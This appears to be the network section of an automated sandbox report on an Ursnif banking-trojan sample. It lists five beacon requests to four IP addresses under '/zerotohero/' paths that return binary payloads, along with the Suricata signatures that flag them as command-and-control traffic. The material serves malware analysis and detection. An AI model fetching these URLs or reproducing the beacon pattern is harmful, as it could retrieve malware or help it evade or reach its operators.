Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| lisfwhite.ch2eck.yaheoo.com | ||
| listwhfite.check3.yaho1o.com |
GET
200
http://185.212.47.65/zerotohero/cdXm_2FVJxK0LegSF/qWrY8fts8Fcq/0NYojf5UlKt/8DhxFr0B_2FsfH/yh95t8o1NlDiZvluicJ4e/y3s9rzRcxmXrVVJ7/Ka_2BqSUQBoccRO/pPeTmlMcibaZ1A8GB4/_2FCWWzpa/5CmD7rRKRlIWq5D4qu77/BGDeyVKNAc3pBFiPPX0/ncnmY9UmOi2ZepGuelaMz6/Fs7cUQ3jbJA0N/WaIYzdmN/W999YPszzQ3zvI2rKp8ilbI/G0MSN_2FTg/61lr6bk_2FfsZ31Jt/feVTEck3UWfb/5ZQcZoVE/Sy48y.asi
REQUEST
RESPONSE
BODY
GET /zerotohero/cdXm_2FVJxK0LegSF/qWrY8fts8Fcq/0NYojf5UlKt/8DhxFr0B_2FsfH/yh95t8o1NlDiZvluicJ4e/y3s9rzRcxmXrVVJ7/Ka_2BqSUQBoccRO/pPeTmlMcibaZ1A8GB4/_2FCWWzpa/5CmD7rRKRlIWq5D4qu77/BGDeyVKNAc3pBFiPPX0/ncnmY9UmOi2ZepGuelaMz6/Fs7cUQ3jbJA0N/WaIYzdmN/W999YPszzQ3zvI2rKp8ilbI/G0MSN_2FTg/61lr6bk_2FfsZ31Jt/feVTEck3UWfb/5ZQcZoVE/Sy48y.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 185.212.47.65
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:13:50 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9adce0da81.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET
200
http://45.155.249.172/zerotohero/_2BNfe26Q_2BhpzcY80eoW/2IbQqms219ain/8xo_2BRo/O79HFwawAOqR1xwy3PGyFgp/h2FreaMQGU/PghXl8ePxYt85SSHr/L_2B7SHWLYe8/Jvu0omXw0U8/B2o2reD4ai5rDs/W5ZivSf7_2FvcBaSlziH8/2oaBAztGA6DuRQnj/fby_2FNeLRkfUIG/Tb9pBn4LDJSKpggRop/2yOnyRMrq/hGr0R03Qs2AMMI3QMxF8/DcYedNwEbb0WMiSm2cz/GpYewdMSs8Cd7hz_2FvN34/4B_2By8bGbelM/gBrumlN3/yo9.asi
REQUEST
RESPONSE
BODY
GET /zerotohero/_2BNfe26Q_2BhpzcY80eoW/2IbQqms219ain/8xo_2BRo/O79HFwawAOqR1xwy3PGyFgp/h2FreaMQGU/PghXl8ePxYt85SSHr/L_2B7SHWLYe8/Jvu0omXw0U8/B2o2reD4ai5rDs/W5ZivSf7_2FvcBaSlziH8/2oaBAztGA6DuRQnj/fby_2FNeLRkfUIG/Tb9pBn4LDJSKpggRop/2yOnyRMrq/hGr0R03Qs2AMMI3QMxF8/DcYedNwEbb0WMiSm2cz/GpYewdMSs8Cd7hz_2FvN34/4B_2By8bGbelM/gBrumlN3/yo9.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 45.155.249.172
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:13:55 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9add3d0cd0.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET
200
http://78.138.9.136/zerotohero/BOMG5brBej/W6MNwYSFq4lSlX9tT/x4Y3Omef7UGN/WZhhSM2s5vi/V1FDzyIOh5EpoI/CWWIkqKkrw75RSUzXr7ex/W1RxkTyF3m2S3f2E/Y99btwsIJQuuhmN/lw3cuoTnNFNiXX7cu0/2whafmQx2/EkaF2FKoKeqHPMNHsEAQ/keKvvr9l1uzq8oU96Le/2jrUUusg_2B0I6xcr09dJj/XFvFn_2Fm4A8m/UqxdWdhP/VRi2h91sbdwC8lBB_2FDjJW/U_2ButnyPo/M3ehIUmus7lD5zNNn/gajTaRAeV8b6/0zF8WivYdTr/uC4wDLoi/v.asi
REQUEST
RESPONSE
BODY
GET /zerotohero/BOMG5brBej/W6MNwYSFq4lSlX9tT/x4Y3Omef7UGN/WZhhSM2s5vi/V1FDzyIOh5EpoI/CWWIkqKkrw75RSUzXr7ex/W1RxkTyF3m2S3f2E/Y99btwsIJQuuhmN/lw3cuoTnNFNiXX7cu0/2whafmQx2/EkaF2FKoKeqHPMNHsEAQ/keKvvr9l1uzq8oU96Le/2jrUUusg_2B0I6xcr09dJj/XFvFn_2Fm4A8m/UqxdWdhP/VRi2h91sbdwC8lBB_2FDjJW/U_2ButnyPo/M3ehIUmus7lD5zNNn/gajTaRAeV8b6/0zF8WivYdTr/uC4wDLoi/v.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 78.138.9.136
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:14:01 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9add9ad7d9.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET
200
http://79.132.130.230/zerotohero/DVrxwIAQMgsf7onOLh/XV75B5oFA/y1vXWahjjQZVMDH_2FiQ/4PZa4sHCsckUL377wx1/ZWvRgGdffXeg9iPEYWZ0h_/2BhA96Rc7xe4R/qby1FhUA/D3J5ocbPv6vcjAoxDEpqdg_/2BxvziDIQC/aLCB4AL9AMx8ac_2B/QNhLbiQcgZin/EpRbwzEa4e4/D_2BKwsvigFCN_/2FBg_2Fw3ZaNSpM8fK07N/yXdvG0NodEjK6LFi/2ZnEMcjmx0YgxZI/dLH_2BvcUmTIQFitsY/hIm1muN9Q/YX6gqoj0w/GcFQn4vTy/4.asi
REQUEST
RESPONSE
BODY
GET /zerotohero/DVrxwIAQMgsf7onOLh/XV75B5oFA/y1vXWahjjQZVMDH_2FiQ/4PZa4sHCsckUL377wx1/ZWvRgGdffXeg9iPEYWZ0h_/2BhA96Rc7xe4R/qby1FhUA/D3J5ocbPv6vcjAoxDEpqdg_/2BxvziDIQC/aLCB4AL9AMx8ac_2B/QNhLbiQcgZin/EpRbwzEa4e4/D_2BKwsvigFCN_/2FBg_2Fw3ZaNSpM8fK07N/yXdvG0NodEjK6LFi/2ZnEMcjmx0YgxZI/dLH_2BvcUmTIQFitsY/hIm1muN9Q/YX6gqoj0w/GcFQn4vTy/4.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 79.132.130.230
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:14:07 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9addf6b499.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
GET
200
http://79.132.130.230/zerotohero/K3vk9WJHpEMX6hbZw9tQyo5/AMBJbLu6tj/I4dyyPRvEIc_2Bo5I/2NUNLIkQqXoM/4CLXycYanau/8WFUZdkBqHxj0k/G1Dz8Bb1qnisHoMvqFItJ/4wfCjdP1Gf4MD015/_2Fjg_2BwAknLxt/5g2XdSihMUmd7kf0Vf/ZYb5g5bV4/ib0vVzu4C_2FW6ak5OEU/GWK9iVTriGnuRYnmHaa/jVg20muCMLk3bbDqYb9K4b/WNo_2BGUwzd9k/NzS1SsLQ/d6CTTcaEu36FGNawX2R0Kqo/C38zpv3wa/W12SJCNS.asi
REQUEST
RESPONSE
BODY
GET /zerotohero/K3vk9WJHpEMX6hbZw9tQyo5/AMBJbLu6tj/I4dyyPRvEIc_2Bo5I/2NUNLIkQqXoM/4CLXycYanau/8WFUZdkBqHxj0k/G1Dz8Bb1qnisHoMvqFItJ/4wfCjdP1Gf4MD015/_2Fjg_2BwAknLxt/5g2XdSihMUmd7kf0Vf/ZYb5g5bV4/ib0vVzu4C_2FW6ak5OEU/GWK9iVTriGnuRYnmHaa/jVg20muCMLk3bbDqYb9K4b/WNo_2BGUwzd9k/NzS1SsLQ/d6CTTcaEu36FGNawX2R0Kqo/C38zpv3wa/W12SJCNS.asi HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Host: 79.132.130.230
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 02 Aug 2023 01:15:18 GMT
Content-Type: application/octet-stream
Content-Length: 182937
Connection: keep-alive
Pragma: public
Accept-Ranges: bytes
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Content-Disposition: inline; filename="64c9ae263464d.bin"
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49165 -> 78.138.9.136:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49162 -> 185.212.47.65:80 | 2033204 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49167 -> 79.132.130.230:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49166 -> 79.132.130.230:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49164 -> 45.155.249.172:80 | 2033203 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49164 -> 45.155.249.172:80 | 2033204 | ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts